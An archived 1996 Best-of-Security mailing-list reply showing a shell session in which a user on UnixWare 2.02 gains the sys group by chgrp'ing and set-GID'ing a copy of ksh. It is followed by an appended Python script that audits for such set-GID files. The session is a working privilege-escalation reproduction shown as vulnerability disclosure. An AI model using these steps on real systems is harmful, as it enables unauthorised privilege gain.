From mib@ppe.bb-data.de  Mon Sep  2 21:17:08 1996
Message-ID: <322A796F.F60@ppe.bb-data.de>
Date: Mon, 02 Sep 1996 08:06:39 +0200
From: Martin Ibert <mib@ppe.bb-data.de>
Organization: BB-DATA GmbH, Berlin, Germany
X-Mailer: Mozilla 2.02 (WinNT; I)
MIME-Version: 1.0
To: "Justin M. Collins" <jcollins@firestorm.servtech.com>
CC: best-of-security@suburbia.net
Subject: Re: BoS: More on the UnixWare problem
References: <199609011421.AAA19562@suburbia.net> <9609011222.ZM22492@firestorm.servtech.com>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Justin M. Collins wrote:

> If I am missing something please let me know.. but according to
> what I did above the bug does not exist.

Maybe it doesn't on your version, but our 2.02 system does exhibit it:

Script started on Mon Sep  2 08:00:35 1996
mib@wesley:pts001 ~ % cp /usr/bin/ksh .
mib@wesley:pts001 ~ % ls -l ksh
-r-xr-xr-x    1 mib      avs       135632 Sep  2 08:00 ksh
mib@wesley:pts001 ~ % chgrp sys ksh
mib@wesley:pts001 ~ % ls -l ksh
-r-xr-xr-x    1 mib      sys       135632 Sep  2 08:00 ksh
mib@wesley:pts001 ~ % chmod 2700 ksh
mib@wesley:pts001 ~ % ls -l ksh
-rwx--l---    1 mib      sys       135632 Sep  2 08:00 ksh
mib@wesley:pts001 ~ % ./ksh
mib-wesley-/home/mib> id
uid=20077(mib) gid=20010(avs) egid=3(sys)
mib-wesley-/home/mib> fuser ./ksh
./ksh:     4446t
mib-wesley-/home/mib> exit
mib@wesley:pts001 ~ % fuser ./ksh
UX:fuser: ERROR: open of /dev/kmem failed: Permission denied
zsh: 4449 exit 1     fuser ./ksh
mib@wesley:pts001 ~ % exit

script done on Mon Sep  2 08:01:27 1996

As you can see, the hacked ksh let me do something that my regular login
shell won't. (fuser(1M)ing a file.)

-- 
---------------------------------------------------------------------------
Dipl.-Inform. Martin Ibert, BB-DATA GmbH, Brunnenstraße 111, D-13355 Berlin
E-Mail <mib@ppe.bb-data.de> - Phone +49-30-245-56582 - Fax +49-30-245-56577
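
A defensive audit for the file state the transcript ends up with, as an added example that is not part of the original message: it reports regular files that carry the set-group-ID bit while their non-root owner is not a member of the file's group (in the transcript, ksh owned by mib with group sys). The function names and the choice to skip root-owned files are assumptions of this example.

```python
import grp
import os
import pwd
import stat
import sys


def owner_gids(uid):
    """Return all GIDs of the user (primary + supplementary), or None if unknown."""
    try:
        pw = pwd.getpwuid(uid)
    except KeyError:
        return None
    gids = {pw.pw_gid}
    gids.update(g.gr_gid for g in grp.getgrall() if pw.pw_name in g.gr_mem)
    return gids


def is_suspect(mode, uid, gid, member_gids):
    """True for a regular set-GID file whose non-root owner is not in its group."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISGID:
        return False
    if uid == 0:
        return False  # assumption: root may install set-GID files for any group
    if member_gids is None:
        return True   # owner has no passwd entry, so the group cannot be justified
    return gid not in member_gids


def audit(root):
    """Walk root without following symlinks and return the suspect paths."""
    cache, hits = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if st.st_uid not in cache:
                cache[st.st_uid] = owner_gids(st.st_uid)
            if is_suspect(st.st_mode, st.st_uid, st.st_gid, cache[st.st_uid]):
                hits.append(path)
    return hits


if __name__ == "__main__":
    for p in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(p)
```

Run it with a directory argument such as a home or scratch filesystem; each printed path is a set-GID file whose group its owner could not normally have assigned.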

